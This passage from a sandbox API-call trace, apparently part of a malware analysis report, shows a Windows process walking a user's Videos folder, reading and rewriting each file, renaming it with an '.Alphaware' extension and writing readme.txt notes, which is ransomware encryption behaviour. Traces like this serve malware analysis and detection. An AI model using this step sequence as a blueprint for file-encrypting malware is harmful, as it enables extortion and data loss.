dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0088.459] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0088.459] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0088.459] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86ecf580, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x86ecf580, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86ecf580, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0088.459] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86ecf580, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x86ecf580, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86ecf580, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0088.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0088.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0088.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0088.459] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcb76d680, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcb76d680, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.459] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fe21070, ftCreationTime.dwHighDateTime=0x1d96ebd, ftLastAccessTime.dwLowDateTime=0xd2cdd8f0, ftLastAccessTime.dwHighDateTime=0x1d9731a, ftLastWriteTime.dwLowDateTime=0xd2cdd8f0, ftLastWriteTime.dwHighDateTime=0x1d9731a, nFileSizeHigh=0x0, nFileSizeLow=0xf98f, dwReserved0=0x0, dwReserved1=0x0, cFileName="0vDMTR303fbv.avi", cAlternateFileName="0VDMTR~1.AVI")) returned 1 [0088.459] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb89aa130, ftCreationTime.dwHighDateTime=0x1d97297, ftLastAccessTime.dwLowDateTime=0x85bd4df0, ftLastAccessTime.dwHighDateTime=0x1d972ea, ftLastWriteTime.dwLowDateTime=0x85bd4df0, ftLastWriteTime.dwHighDateTime=0x1d972ea, nFileSizeHigh=0x0, nFileSizeLow=0x157d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="87P5PxsKOq.avi", cAlternateFileName="87P5PX~1.AVI")) returned 1 [0088.459] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe51260, ftCreationTime.dwHighDateTime=0x1d96ee1, ftLastAccessTime.dwLowDateTime=0xa5896d20, ftLastAccessTime.dwHighDateTime=0x1d9704d, ftLastWriteTime.dwLowDateTime=0xa5896d20, ftLastWriteTime.dwHighDateTime=0x1d9704d, nFileSizeHigh=0x0, nFileSizeLow=0x9173, dwReserved0=0x0, dwReserved1=0x0, cFileName="b73Vtl-2.mp4", cAlternateFileName="")) returned 1 [0088.459] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x159a9570, ftCreationTime.dwHighDateTime=0x1d97423, ftLastAccessTime.dwLowDateTime=0x23d43fe0, ftLastAccessTime.dwHighDateTime=0x1d97664, ftLastWriteTime.dwLowDateTime=0x23d43fe0, ftLastWriteTime.dwHighDateTime=0x1d97664, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bIeMKBNSsvf5WRB", cAlternateFileName="BIEMKB~1")) returned 1 [0088.459] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798ad850, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798ad850, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7e35a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0088.459] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedc0e0f0, ftCreationTime.dwHighDateTime=0x1d9726e, ftLastAccessTime.dwLowDateTime=0x96bfb180, ftLastAccessTime.dwHighDateTime=0x1d9730b, ftLastWriteTime.dwLowDateTime=0x96bfb180, ftLastWriteTime.dwHighDateTime=0x1d9730b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hWvMFQJJJ", cAlternateFileName="HWVMFQ~1")) returned 1 [0088.459] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa07d4070, ftCreationTime.dwHighDateTime=0x1d96efb, ftLastAccessTime.dwLowDateTime=0xb369e3e0, ftLastAccessTime.dwHighDateTime=0x1d97366, ftLastWriteTime.dwLowDateTime=0xb369e3e0, ftLastWriteTime.dwHighDateTime=0x1d97366, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvuGC2saBZF J", cAlternateFileName="JVUGC2~1")) returned 1 [0088.460] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65e9cc30, ftCreationTime.dwHighDateTime=0x1d975bd, ftLastAccessTime.dwLowDateTime=0x5bc10920, ftLastAccessTime.dwHighDateTime=0x1d9767c, ftLastWriteTime.dwLowDateTime=0x5bc10920, ftLastWriteTime.dwHighDateTime=0x1d9767c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oaG6wqo", cAlternateFileName="")) returned 1 [0088.460] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1242580, ftCreationTime.dwHighDateTime=0x1d975a3, ftLastAccessTime.dwLowDateTime=0xdf4a9e30, ftLastAccessTime.dwHighDateTime=0x1d97679, ftLastWriteTime.dwLowDateTime=0xdf4a9e30, ftLastWriteTime.dwHighDateTime=0x1d97679, nFileSizeHigh=0x0, nFileSizeLow=0xfc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="zdm5mb5UMA.avi", cAlternateFileName="ZDM5MB~1.AVI")) returned 1 [0088.460] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e87f5c0, ftCreationTime.dwHighDateTime=0x1d972f0, ftLastAccessTime.dwLowDateTime=0x7493f420, ftLastAccessTime.dwHighDateTime=0x1d974bb, ftLastWriteTime.dwLowDateTime=0x7493f420, ftLastWriteTime.dwHighDateTime=0x1d974bb, nFileSizeHigh=0x0, nFileSizeLow=0xfb6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="zOe1LTkImCuAAhrwbXf9.swf", cAlternateFileName="ZOE1LT~1.SWF")) returned 1 [0088.460] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2cc1cf0, ftCreationTime.dwHighDateTime=0x1d96ba1, ftLastAccessTime.dwLowDateTime=0x5aac5550, ftLastAccessTime.dwHighDateTime=0x1d975ee, ftLastWriteTime.dwLowDateTime=0x5aac5550, ftLastWriteTime.dwHighDateTime=0x1d975ee, nFileSizeHigh=0x0, nFileSizeLow=0x162a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZShqFxkOqd6c5.mp4", cAlternateFileName="ZSHQFX~1.MP4")) returned 1 [0088.460] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc15bca60, ftCreationTime.dwHighDateTime=0x1d96987, ftLastAccessTime.dwLowDateTime=0xce25a650, ftLastAccessTime.dwHighDateTime=0x1d974ca, ftLastWriteTime.dwLowDateTime=0xce25a650, ftLastWriteTime.dwHighDateTime=0x1d974ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zu2JIWj2WW", cAlternateFileName="ZU2JIW~1")) returned 1 [0088.460] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc15bca60, ftCreationTime.dwHighDateTime=0x1d96987, ftLastAccessTime.dwLowDateTime=0xce25a650, ftLastAccessTime.dwHighDateTime=0x1d974ca, ftLastWriteTime.dwLowDateTime=0xce25a650, ftLastWriteTime.dwHighDateTime=0x1d974ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zu2JIWj2WW", cAlternateFileName="ZU2JIW~1")) returned 0 [0088.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0088.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0088.460] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\0vDMTR303fbv.avi", dwFileAttributes=0x80) returned 1 [0088.460] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0088.461] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\0vDMTR303fbv.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\0vdmtr303fbv.avi"), fInfoLevelId=0x0, lpFileInformation=0x23fcec8 | out: lpFileInformation=0x23fcec8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4fe21070, ftCreationTime.dwHighDateTime=0x1d96ebd, ftLastAccessTime.dwLowDateTime=0xd2cdd8f0, ftLastAccessTime.dwHighDateTime=0x1d9731a, ftLastWriteTime.dwLowDateTime=0xd2cdd8f0, ftLastWriteTime.dwHighDateTime=0x1d9731a, nFileSizeHigh=0x0, nFileSizeLow=0xf98f)) returned 1 [0088.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0088.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0088.461] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\0vDMTR303fbv.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\0vdmtr303fbv.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0088.461] ReadFile (in: hFile=0x254, lpBuffer=0x23fd110, nNumberOfBytesToRead=0xf98f, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x23fd110*, lpNumberOfBytesRead=0x23eb38*=0xf98f, lpOverlapped=0x0) returned 1 [0088.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0088.484] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\0vDMTR303fbv.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\0vdmtr303fbv.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0088.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0088.490] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\0vDMTR303fbv.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\0vdmtr303fbv.avi"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fe21070, ftCreationTime.dwHighDateTime=0x1d96ebd, ftLastAccessTime.dwLowDateTime=0xd2cdd8f0, ftLastAccessTime.dwHighDateTime=0x1d9731a, ftLastWriteTime.dwLowDateTime=0x86f1b840, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14d88)) returned 1 [0088.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0088.490] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\0vDMTR303fbv.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\0vdmtr303fbv.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\0vDMTR303fbv.avi.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\0vdmtr303fbv.avi.alphaware")) returned 1 [0088.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0088.491] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\videos\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0088.492] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\87P5PxsKOq.avi", dwFileAttributes=0x80) returned 1 [0088.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0088.492] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\87P5PxsKOq.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\87p5pxskoq.avi"), fInfoLevelId=0x0, lpFileInformation=0x24bcc48 | out: lpFileInformation=0x24bcc48*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xb89aa130, ftCreationTime.dwHighDateTime=0x1d97297, ftLastAccessTime.dwLowDateTime=0x85bd4df0, ftLastAccessTime.dwHighDateTime=0x1d972ea, ftLastWriteTime.dwLowDateTime=0x85bd4df0, ftLastWriteTime.dwHighDateTime=0x1d972ea, nFileSizeHigh=0x0, nFileSizeLow=0x157d0)) returned 1 [0088.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0088.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0088.493] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\87P5PxsKOq.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\87p5pxskoq.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0088.493] ReadFile (in: hFile=0x254, lpBuffer=0x127409d8, nNumberOfBytesToRead=0x157d0, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x127409d8*, lpNumberOfBytesRead=0x23eb38*=0x157d0, lpOverlapped=0x0) returned 1 [0088.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0088.515] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\87P5PxsKOq.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\87p5pxskoq.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0088.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0088.519] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\87P5PxsKOq.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\87p5pxskoq.avi"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb89aa130, ftCreationTime.dwHighDateTime=0x1d97297, ftLastAccessTime.dwLowDateTime=0x85bd4df0, ftLastAccessTime.dwHighDateTime=0x1d972ea, ftLastWriteTime.dwLowDateTime=0x86f67b00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1cb48)) returned 1 [0088.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0088.519] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\87P5PxsKOq.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\87p5pxskoq.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\87P5PxsKOq.avi.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\87p5pxskoq.avi.alphaware")) returned 1 [0088.520] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\b73Vtl-2.mp4", dwFileAttributes=0x80) returned 1 [0088.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0088.521] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\b73Vtl-2.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\b73vtl-2.mp4"), fInfoLevelId=0x0, lpFileInformation=0x253a698 | out: lpFileInformation=0x253a698*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xdbe51260, ftCreationTime.dwHighDateTime=0x1d96ee1, ftLastAccessTime.dwLowDateTime=0xa5896d20, ftLastAccessTime.dwHighDateTime=0x1d9704d, ftLastWriteTime.dwLowDateTime=0xa5896d20, ftLastWriteTime.dwHighDateTime=0x1d9704d, nFileSizeHigh=0x0, nFileSizeLow=0x9173)) returned 1 [0088.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0088.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0088.521] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\b73Vtl-2.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\b73vtl-2.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0088.521] ReadFile (in: hFile=0x254, lpBuffer=0x253a8c0, nNumberOfBytesToRead=0x9173, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x253a8c0*, lpNumberOfBytesRead=0x23eb38*=0x9173, lpOverlapped=0x0) returned 1 [0088.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0088.552] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\b73Vtl-2.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\b73vtl-2.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0088.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0088.556] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\b73Vtl-2.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\b73vtl-2.mp4"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe51260, ftCreationTime.dwHighDateTime=0x1d96ee1, ftLastAccessTime.dwLowDateTime=0xa5896d20, ftLastAccessTime.dwHighDateTime=0x1d9704d, ftLastWriteTime.dwLowDateTime=0x86fb3dc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xc2c8)) returned 1 [0088.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0088.556] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\b73Vtl-2.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\b73vtl-2.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\b73Vtl-2.mp4.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\b73vtl-2.mp4.alphaware")) returned 1 [0088.557] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\desktop.ini", dwFileAttributes=0x80) returned 1 [0088.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0088.557] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\videos\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23fe318 | out: lpFileInformation=0x23fe318*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x798ad850, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798ad850, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7e35a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0088.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0088.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0088.557] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0088.558] ReadFile (in: hFile=0x250, lpBuffer=0x23fe740, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x23fe740*, lpNumberOfBytesRead=0x23eb38*=0x1f8, lpOverlapped=0x0) returned 1 [0088.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0088.579] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\videos\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0088.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0088.583] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\videos\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798ad850, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798ad850, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x87000080, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x374)) returned 1 [0088.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0088.583] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\videos\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\desktop.ini.alphaware")) returned 1 [0088.585] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zdm5mb5UMA.avi", dwFileAttributes=0x80) returned 1 [0088.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0088.585] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zdm5mb5UMA.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zdm5mb5uma.avi"), fInfoLevelId=0x0, lpFileInformation=0x247ee18 | out: lpFileInformation=0x247ee18*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xa1242580, ftCreationTime.dwHighDateTime=0x1d975a3, ftLastAccessTime.dwLowDateTime=0xdf4a9e30, ftLastAccessTime.dwHighDateTime=0x1d97679, ftLastWriteTime.dwLowDateTime=0xdf4a9e30, ftLastWriteTime.dwHighDateTime=0x1d97679, nFileSizeHigh=0x0, nFileSizeLow=0xfc09)) returned 1 [0088.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0088.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0088.585] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zdm5mb5UMA.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zdm5mb5uma.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0088.586] ReadFile (in: hFile=0x250, lpBuffer=0x247f050, nNumberOfBytesToRead=0xfc09, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x247f050*, lpNumberOfBytesRead=0x23eb38*=0xfc09, lpOverlapped=0x0) returned 1 [0088.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0088.605] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zdm5mb5UMA.avi" (normalized: 